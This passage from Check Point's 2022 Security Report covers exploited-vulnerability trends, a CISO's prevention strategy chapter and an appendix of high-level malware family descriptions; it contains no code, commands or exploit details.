PHPUnit remote code execution (CVE-2017-9841), often used to exploit vulnerable
WordPress plugins.
The 2020 vulnerabilities remained prominent, leveraged in 11% of attacks. Among
the most significant was the Draytek Vigor series buffer overflow vulnerabilities
(CVE-2020-10826, CVE-2020-10827, CVE-2020-10828), which had a 41% share of
global impact on organizations. These vulnerabilities could be leveraged to run
arbitrary code on vulnerable Draytek routers, using a specially crafted remote
HTTP request.
In 2021, we observed a slower adaptation of vulnerabilities compared to previous
years. The chart reveals that 2021 vulnerabilities were increasingly exploited by
C H A P T E R 6
https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ https://isc.sans.edu/diary/28084
58CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 58CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Figure 35: Percentage of attacks leveraging vulnerabilities by Disclosure Year per Month.
JA N
21 FE
B 2 1
MA R 2
1
AP R 2
1
MA Y 2
1
JU N
21 JU
L 2 1
AU G 2
1 SE
P 2 1
OC T 2
1
NO V 2
1
DE C 2
1
100%
90%
80%
70%
60%
50%
40%
30%
20%
10%
0%
2021 2020 2019 2018 2017 2016 2015 2014 2013 2012 2011 Older
hackers from the middle of the year, corresponding with a slight decrease in the use
of CVEs from 2017.
59CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
BY JONY FISCHBEIN CISO for Check Point Software
C H A P T E R 7
PREVENTING THE NEXT CYBER PANDEMIC— A STRATEGY FOR ACHIEVING BETTER SECURITY
07
60CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 60CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
THREAT PREVENTION — PREVENT ATTACKS BEFORE THEY HAPPEN One of the biggest challenges facing security practitioners is Gen V attacks – the
combination of a wide breadth of threats, large scale attacks and a broad attack
surface. True comprehensive protection requires an architected approach that
prevents attacks before they happen. Ultimately, the goal is to defeat all attacks
across all possible vectors. A security architecture that enables and facilitates
a unified and cohesive protection infrastructure is going to provide more
comprehensive and faster protection than an infrastructure composed of pieces
that don’t work together. This is the heart of what Check Point Infinity delivers – a
security architecture to prevent attacks before they occur.
WHEN YOUR PERIMETER IS EVERYWHERE AND ATTACKS KEEP ADVANCING, YOUR BUSINESS NEEDS ACCURATE PREVENTION BASED ON REAL TIME THREAT INTELLIGENCE In the current climate of mega supply chain attacks and the constant fight against
new evolved malware, threat intelligence and rapid response capabilities are vital.
Comprehensive intelligence to proactively eliminate threats, managed security
services to monitor your network, and incident response capabilities to quickly
respond to and resolve attacks, are all crucial to keeping your business up and
running in 2022. Malware is constantly evolving, making threat intelligence an
essential tool for almost every company to consider. When an organization has
financial, personal, intellectual, or national assets to maintain and secure, a more
comprehensive approach to security is the only actual way to protect against
today’s attackers - and one of the most effective proactive security solutions
available today is threat intelligence. Threat intelligence must cover all attack
surfaces including cloud, mobile, network, endpoint, and IoT, because these
vectors are commonplace in an enterprise. Threat intelligence isn’t just data - its
practice, and it should fuel the move toward a prevention-first approach, blocking
attacks before they penetrate, gaining the best catch rate of known and unknown
threats, and achieving a near zero false positive rate, interrupting users as little
as possible.
C H A P T E R 7
61CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 61CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
SECURE EVERYTHING, AS EVERYTHING IS A POTENTIAL TARGET To achieve effective coverage, organizations should seek a single solution that can
cover all attack surfaces and vectors. In a multi hybrid environment, where the
perimeter is now everywhere, security should be able to protect it all.
Email, web browsing, servers and storage are only the beginning. Mobile apps,
cloud and external storage are all essential, so is the compliance of connected
mobile and endpoint devices, and your growing IoT device estate. Workloads,
containers, and serverless applications on multi- and hybrid-cloud environments
should also be a part of the checklist at all times. With the rapid shift to cloud
and hybrid working, it’s become even more important to have a robust breach
prevention strategy.
LEVERAGING A COMPLETE UNIFIED ARCHITECTURE Comprehensive visibility across your entire network estate, gained through
consolidation, is now essential when it comes to guarding against increasingly
sophisticated attacks.
Many companies attempt to build their security using a patchwork of single-
purpose products from multiple vendors, but often fail and are left with security
gaps caused by disjointed technologies. This approach also produces a huge
overhead because it relies on working with multiple systems and vendors instead
of one integrated solution. In order to achieve complete inclusive security,
companies should therefore adopt a unified multi-layer approach that protects all
IT elements, including networks, endpoints, cloud, mobile and IoT, all sharing the
same prevention architecture and being fed the same threat intelligence data in
real time.
C H A P T E R 7
62CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 62CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
∙ Educate Employees to Recognize Potential
Threats: User education has always been a
key element in avoiding malware infections.
The basics of knowing where files came
from, why the employee is receiving them,
and whether or not they can trust the sender
continue to be useful tools your employees
should use before opening files and emails.
The most common infection methods used in
ransomware campaigns are still spam and
phishing emails. Quite often, user awareness
can prevent an attack before it occurs. Take
the time to educate your users, and ensure
that if they see something unusual, they
report it to your security teams immediately.
MAINTAIN SECURITY HYGIENE ∙ Patching: All too often, attacks are able to
penetrate defenses by leveraging known
vulnerabilities for which a patch exists but
has not been applied. Organizations should
strive to make sure up-to-date security
patches are maintained across all systems
and software.
∙ Segmentation: Networks should be
segmented, applying strong firewall and IPS
safeguards between the network segments in
order to contain infections from propagating
across the entire network.
INFECTION RATE Virus infection rate (Ro) (source: WHO) The average number of people that one person with a virus infects: Flu: 1.3, SARS: 2-4, Corona: 2.5, Ebola: 1.6-2, Zika: 2-6.6, Measles: 11-18
INFECTION PREVENTION Best treatment: Vaccination Dealing with Infection Best Practices: 1) Quarantine, Shelter-in-Place 2) Isolation 3) Contact Tracing
SAFETY BEST PRACTICES Common treatment (until vaccination): 1) Mask 2) Hygiene 3) Social Distancing
BIOLOGICAL PANDEMIC
INFECTION RATE Malware infection rate (Ro) The average number of hosts that one host with a malware infects: Cyber attack: >27 (source: WEF, NSTU) Slammer: Doubled in size every 8.5 seconds Code Red: 2,000 new hosts per minute
INFECTION PREVENTION Best treatment: Real Time Prevention Best Practices: Continuous process of: 1) Quarantine: Sandboxing, Micro-Segmentation 2) Isolation: Zero Trust, Segregation 3) Tracing: Threat Intelligence, AI, SOC, Posture Management
SAFETY BEST PRACTICES 1) Awareness: Think before you click… 2) Cyber Hygiene: Patches, Compliance… 3) Asset Distancing: Network Segmentation, Multi-Factor Authentication…
CYBER PANDEMIC
BIOLOGICAL PANDEMIC VS. CYBER PANDEMIC Similarities and Parallelization, Lessons Learned
C H A P T E R 7
63CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 63CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
numerous more. Each of these technologies
can be highly effective in specific scenarios,
covering specific file types or attack vectors.
Strong solutions integrate a wide range of
technologies and innovations in order to
effectively combat modern attacks in IT
environments. In addition to traditional,
signature-based protections like antivirus
and IPS, organizations need to incorporate
additional layers to prevent against new,
unknown malware that has no known
signature. Two key components to consider
are threat extraction (file sanitization) and
threat emulation (advanced sandboxing). Each
element provides distinct protection that,
when used together, offer a comprehensive
solution for protection against unknown
malware at the network level and directly on
endpoint devices.
∙ Review: Security products’ policies must
be carefully reviewed, and incident logs and
alerts should be continuously monitored.
∙ Audit: Routine audits and penetration testing
should be conducted across all systems.
∙ Principle of Least Privilege: User and
software privileges should be kept to a
minimum – is there really a need for all users
to have local admin rights on their devices?
∙ Implementing the most advanced security
technologies: There is no single silver-
bullet technology that can protect from all
threats and all threat vectors. However,
there are many great technologies and ideas
available – machine learning, sandboxing,
anomaly detection, content disarmament, and
C H A P T E R 7
64CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
CONCLUSION As predicted, in a year that began with the fallout from one of the most devastating
supply chain attacks in history, we’ve seen threat actors grow in confidence and
sophistication. By the end of the year, this culminated in the Log4j vulnerability
exploit, which yet again caught the security community off guard and brought to
the fore the sheer level of risk inherent to software supply chains. In the months
between, we saw cloud services under attack, threat actors increasing their focus
on mobile devices, the Colonial Pipeline held to ransom, and the resurgence of one
of the most dangerous botnets in history.
But it’s not all doom and gloom. We also saw cracks in the ransomware ecosystem
widen in 2021, as governments and law enforcement agencies around the world
resolved to take a tougher stance on ransomware groups in particular. Instead of
relying on reactive and remedial action, some shocking events woke governments
up to the fact that they needed to take a more pre-emptive, proactive approach
to dealing with cyber risk. That same philosophy extends to businesses too, who
can no longer afford to take a disjointed, siloed, reactionary approach to dealing
with threats. They need 360-degree visibility, real-time threat intelligence, and a
security infrastructure that can be mobilized in an effective, joined-up manner.
65CHECK POINT SOF T WARE | SECURIT Y REPORT 2022 65CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
APPENDIX MALWARE FAMILY DESCRIPTIONSS
66CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
AgentTesla AgentTesla is an advanced RAT which functions as a keylogger and password stealer and has been active since 2014. AgentTesla can monitor and collect the victim's keyboard input and system clipboard, and can record screenshots and exfiltrate credentials for a variety of software installed on a victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client). AgentTesla is sold on various online markets and hacking forums.
AlienBot AlienBot is a banking Trojan for Android, sold underground as Malware-as-a-Service (MaaS). It supports keylogging, dynamic overlays for credentials theft, as well as SMS harvesting for 2FA bypass. Additional remote control capabilities are provided using a TeamViewer module.
Bazar Discovered in 2020, Bazar Loader and Bazar Backdoor are used in the initial stages of infection by the WizardSpider cybercrime gang. The loader is responsible for fetching the next stages, and the backdoor is meant for persistence. The infections are usually followed by a full-scale ransomware deployment, using Conti or Ryuk.
CryptoBot CryptoBot is an advanced cryptominer that collects the victim’s wallet and account information upon infection. In December 2021 CryptoBot was observed in a campaign that targeted users with a pirated copy of the Windows operating system.
Cl0p Cl0p is a ransomware that was first discovered in early 2019 and mostly targets large firms and corporations. During 2020, Cl0p operators began exercising a double-extortion strategy, where in addition to encrypting the victim's data, the attackers also threaten to publish stolen information unless ransom demands are met. In 2021 Cl0p ransomware was used in numerous attacks where the initial access was gained by utilizing zero-day vulnerabilities in the Accellion File Transfer Appliance.
67CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
DanaBot DanaBot is a modular banking Trojan written in Delphi that targets the Windows platform. The malware, which was first observed in 2018, is distributed via malicious spam emails. Once a device is infected, the malware downloads updated configuration code and other modules from the C&C server. Available modules include a “sniffer” to intercept credentials, a “stealer” to steal passwords from popular applications, a “VNC” module for remote control, and more.
DarkGate DarkGate is a multifunction malware active since December 2017 which combines ransomware, credential stealing, and RAT and cryptomining abilities. Targeting mostly the Windows OS, DarkGate employs a variety of evasion techniques.
Dridex Dridex is a Banking Trojan turned botnet, that targets the Windows platform. It is delivered by spam campaigns and Exploit Kits, and relies on WebInjects to intercept and redirect banking credentials to an attacker-controlled server. Dridex contacts a remote server, sends information about the infected system, and can also download and execute additional modules for remote control.
Emotet Emotet is an advanced, self-propagating and modular Trojan. Emotet was once used to employ as a banking Trojan, and now is used as a distributer for other malware or malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. In addition, Emotet can also be spread through phishing spam emails containing malicious attachments or links.
FluBot FluBot is an Android malware distributed via phishing SMS messages (SMiShing), most often impersonating logistics delivery brands. Once the user clicks the link inside the message, they are redirected to the download of a fake application containing FluBot. Once installed the malware has various capabilities to harvest credentials and support the Smishing operation itself, including uploading of the contacts list, as well as sending SMS messages to other phone numbers.
68CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
FlyTrap FlyTrap is an Android Trojan built to steal Facebook credentials, location, email address, IP and more. The Trojan originally spread via fake Android apps on Google Play, encouraging the users to login to their Facebook account. At this stage FlyTrap uses JavaScript injection to hijack the session, and sends its details to the C&C server, allowing the attackers to gain access to the Facebook account, from a remote location.
FormBook FormBook is an Infostealer targeting the Windows OS and was first detected in 2016. It is marketed as Malware-as-a-service (MaaS) in underground hacking forums for its strong evasion techniques and relatively low price. FormBook harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to orders from its C&C.
Glupteba Known since 2011, Glupteba is a Windows backdoor which gradually matured into a botnet. By 2019 it included a C&C address update mechanism through public BitCoin lists, an integral browser stealer capability and a router exploiter.
Hiddad Android malware which repackages legitimate apps and then releases them to a third-party store. Its main function is displaying ads, but it also can gain access to key security details built into the OS.
IcedID IcedID is a banking Trojan which first emerged in September 2017. It spreads by mail spam campaigns and often uses other malwares like Emotet to help it proliferate. IcedID uses evasive techniques like process injection and steganography, and steals user financial data via both redirection attacks (installs a local proxy to redirect users to fake-cloned sites) and web injection attacks.
Kinsing Discovered in 2020, Kinsing is a Golang cryptominer with a rootkit component. Originally designed to exploit Linux systems, Kinsing was installed on compromised servers by abusing vulnerabilities on internet facing services. Later in 2021 a Windows variant of the malware was developed as well, allowing the attackers to increase their attack surface.
69CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
LemonDuck LemonDuck is a cryptominer first discovered in 2018, which targets Windows systems. It has advanced propagation modules, including sending malspam, RDP brute-forcing and mass-exploitation via known vulnerabilities such as BlueKeep. Over time it was observed to harvest emails and credentials, as well as to deliver other malware families, like Ramnit.
LokiBot LokiBot is commodity infostealer for Windows. It harvests credentials from a variety of applications, web browsers, email clients, IT administration tools such as PuTTY, and more. LokiBot has been sold on hacking forums and believed to have had its source code leaked, thus allowing for a range of variants to appear. It was first identified in February 2016.
Mirai Mirai is an infamous Internet-of-Things (IoT) malware that tracks vulnerable IoT devices, such as web cameras, modems and routers, and turns them into bots. The botnet is used by its operators to conduct massive distributed denial-of-service (DDoS) attacks. The Mirai botnet first surfaced in September 2016 and quickly made headlines due to some large-scale attacks including a massive DDoS attack used to knock the entire country of Liberia offline, and a DDoS attack against the Internet infrastructure firm Dyn, which provides a significant portion of the United States internet's infrastructure.
MyloBot Mylobot is a sophisticated botnet that first emerged in June 2018 and is equipped with complex evasion techniques including anti-VM, anti-sandbox, and anti- debugging techniques. The botnet allows an attacker to take complete control of the user's system, downloading any additional payload from its C&C.
NanoCore NanoCore is a Remote Access Trojan that targets Windows operating system users and was first observed in the wild in 2013. All versions of the RAT contain basic plugins and functionalities such as screen capture, cryptocurrency mining, remote control of the desktop and webcam session theft.
70CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
NRSMiner NSRMiner is a cryptominer that surfaced around November 2018, and was mainly spread in Asia, specifically Vietnam, China, Japan and Ecuador. After the initial infection, it uses the famous EternalBlue SMB exploit to propagate to other vulnerable computers in internal networks and eventually starts mining the Monero (XMR) Cryptocurrency.
Pegasus Pegasus is a highly sophisticated spyware which targets Android and iOS mobile devices, developed by the Israeli NSO group. The malware is offered for sale, mostly to government-related organizations and corporates. Pegasus can leverage vulnerabilities which allow it to silently jailbreak the device and install the malware. The malware infects its targets via several means: Spear phishing SMS messages which contains a malicious link or URL redirect, without any action required from the user (“Zero Click”), and more. The app features multiple spying modules such as screenshot taking, call recording, access to messaging applications, keylogging and browser history exfiltration.
Phorpiex Phorpiex (aka Trik) is a botnet (aka Trik) that has been active since 2010 and at its peak controlled more than a million infected hosts. It is known for distributing other malware families via spam campaigns as well as fueling large-scale spam and sextortion campaigns.
Qbot Qbot AKA QakBot is a banking Trojan that first appeared in 2008. It was designed to steal a user’s banking credentials and keystrokes. Often distributed via spam email, Qbot employs several anti-VM, anti-debugging, and anti-sandbox techniques to hinder analysis and evade detection.
Raccoon Raccoon infostealer was first observed in April 2019. This infostealer targets Windows systems and is sold as a MaaS (Malware-as-a-Service) in underground forums. It is a simple infostealer capable of collecting browser cookies, history, login credentials, cryptocurrency wallets and credit card information.
Ragnar Locker Ragnar Locker is a ransomware first discovered in Dec. 2019. It deploys sophisticated evasion techniques including deployment as a virtual machine on targeted systems to hide its activity. Ragnar was used in an attack against Portugal’s national electric company in a double-extortion act where the attackers published sensitive data stolen from the victim.
71CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Ramnit Ramnit is a modular banking Trojan first discovered in 2010. Ramnit steals web session information, giving its operators the ability to steal account credentials for all services used by the victim, including bank accounts, and corporate and social networks accounts. The Trojan uses both hardcoded domains as well as domains generated by a DGA (Domain Generation Algorithm) to contact the C&C server and download additional modules.
RedLine Stealer RedLine Stealer is a trending Infostealer and was first observed in March 2020. Sold as a MaaS (Malware-as-a-Service), and often distributed via malicious email attachments, it has all the capabilities of modern infostealer - web browser information collection (credit card details, session cookies and autocomplete data), harvesting of cryptocurrency wallets, ability to download additional payloads, and more.
Remcos Remcos is a RAT that first appeared in the wild in 2016. Remcos distributes itself through malicious Microsoft Office documents, which are attached to SPAM emails, and is designed to bypass Microsoft Windowss UAC security and execute malware with high-level privileges.
RigEK The oldest and best known of the currently operating Exploit Kits, RigEK has been around since mid-2014. Its services are offered for sale on hacking forums and the TOR Network. Some “entrepreneurs” even re-sell low-volume infections for those malware developers not yet big enough to afford the full-fledged service. RigEK has evolved over the years to deliver anything from AZORult and Dridex to little-known ransomware and cryptominers.
RubyMiner RubyMiner was first seen in the wild in January 2018 and targets both Windows and Linux servers. RubyMiner seeks vulnerable web servers (such as PHP, Microsoft IIS, and Ruby on Rails) to use for cryptomining, using the open source Monero miner XMRig.
72CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Ryuk Ryuk is a ransomware used by the TrickBot gang in targeted and well-planned attacks against several organizations worldwide. The ransomware was originally derived from the Hermes ransomware, whose technical capabilities are relatively low, and includes a basic dropper and a straight-forward encryption scheme. Nevertheless, Ryuk was able to cause severe damage to targeted organizations, forcing them to pay extremely high ransom payments in Bitcoin. Unlike common ransomware, systematically distributed via massive spam campaigns and Exploit Kits, Ryuk is used exclusively in tailored attacks.
Snake Keylogger Snake Keylogger is a modular .NET keylogger/infostealer. Surfaced around late 2020, it grew fast in popularity among cyber criminals. Snake is capable of recording keystrokes, taking screenshots, harvesting credentials and clipboard content. It supports exfiltration of the stolen data by both HTTP and SMTP protocols.
REvil REvil (aka Sodinokibi) is a Ransomware-as-a-service which operates an “affiliates” program and was first spotted in the wild in 2019. REvil encrypts data in the user’s directory and deletes shadow copy backups to make data recovery more difficult. In addition, REvil affiliates use various tactics to spread it, including through spam and server exploits, as well as hacking into managed service providers (MSP) backends, and through malvertising campaigns that redirect to the RIG Exploit Kit.
SparrowDoor SparrowDoor is an advanced backdoor used by the FamousSparrow APT group to spy on hotels, governments and more. It was spotted exploiting the Microsoft Exchange ProxyLogon vulnerability around March 2021. The backdoor is loaded using DLL Hijacking combined with a legitimate binary, to help bypass AV products.
SunBurst SunBurst is the backdoor that was planted within SolarWinds’s Orion IT management software during 2020, as part of the infamous supply chain attack, hitting thousands of organizations worldwide. It is a persistent backdoor that provided attackers with an initial foothold within the organizations. If the infected machines passed all the requirements, and did not contain various blacklisted services or AV software, Sunburst would later deploy additional memory implants (like TearDrop) for command execution and lateral movement capabilities.
73CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
Triada Triada which was first spotted in 2016, is a modular backdoor for Android which grants admin privileges to download another malware. Its latest version is distributed via adware development kits in WhatsApp for Android.
TrickBot TrickBot is a modular banking Trojan, attributed to the WizardSpider cybercrime gang. Mostly delivered via spam campaigns or other malware families such as Emotet and BazarLoader. TrickBot sends information about the infected system and can also download and execute arbitrary modules from a large array of available modules, including a VNC module for remote control and an SMB module for spreading within a compromised network. Once a machine is infected, the threat actors behind this malware, utilize this wide array of modules not only to steal banking credentials from the target PC, but also for lateral movement and reconnaissance on the targeted organization itself, prior to delivering a company- wide targeted ransomware attack.
Ursnif Ursnif is a variant of the Gozi banking Trojan for Windows, whose source code has been leaked online. It has man-in-the-browser capabilities to steal banking information and credentials for popular online services. In addition, it can steal information from local email clients, browsers and cryptocurrency wallets. Finally, it can download and execute additional files on the infected system.
Vidar Vidar is an infostealer that targets Windows operating systems. First detected at the end of 2018, it is designed to steal passwords, credit card data and other sensitive information from various web browsers and digital wallets. Vidar is sold on various online forums and used as a malware dropper to download GandCrab ransomware as its secondary payload.
WannaMine WannaMine is a sophisticated Monero cryptomining worm that spreads the EternalBlue exploit. WannaMine implements a spreading mechanism and persistence techniques by leveraging the Windows Management Instrumentation (WMI) permanent event subscriptions.
74CHECK POINT SOF T WARE | SECURIT Y REPORT 2022
xHelper xHelper is an Android malware which mainly shows intrusive pop-up ads and notification spam. It is very hard to remove once installed due to its reinstallation capabilities. First observed in March 2019, xHelper has now infected more than 45,000 devices.
XMRig XMRig is open-source CPU mining software used to mine the Monero cryptocurrency. Threat actors often abuse this open-source software by integrating it into their malware to conduct illegal mining on victims’ devices.
ZLoader ZLoader is a banking malware which uses webinjects to steal credentials and private information, and can extract passwords and cookies from the victim’s web browser. It downloads VNC that allows the threat actors to connect to the victim’s system and perform financial transactions from the user’s device. First seen in 2016, the Trojan is based on leaked code of the Zeus malware from 2011. In 2020, the malware is very popular among threat actors and includes many new variants.
z0Miner Z0Miner, first observed in November 2020 is a cryptominer which was found on thousands of servers exploited by Oracle’s WebLogic Server Remote Code Execution flaw. The group behind Z0miner has since been taking advantage of the Atlassian Confluence RCE vulnerability (CVE-2021-26084), to infect additional servers.
CONTACT US WORLDWIDE HEADQUARTERS
5 Ha’Solelim Street, Tel Aviv 67897, Israel Tel: 972-3-753-4555 | Fax: 972-3-624-1100
Email: info@checkpoint.com
U.S. HEADQUARTERS 959 Skyway Road, Suite 300, San Carlos, CA 94070
Tel: 800-429-4391 | 650-628-2000 | Fax: 650-654-4233
UNDER ATTACK? Contact our Incident Response Team:
emergency-response@checkpoint.com
CHECK POINT RESEARCH PODCAST Tune in to cp<radio> to get CPR’s latest research,
plus behind the scenes and other exclusive content. Visit us at https://research.checkpoint.com/category/cpradio/
W W W . C H E C K P O I N T . C O M
© 1994-2022 Check Point Software Technologies Ltd. All Rights Reserved.
https://research.checkpoint.com/category/cpradio/ http://WWW.CHECKPOINT.COM
CHAPTER 1: INTRODUCTION TO THE CHECK POINT 2022 SECURITY REPORT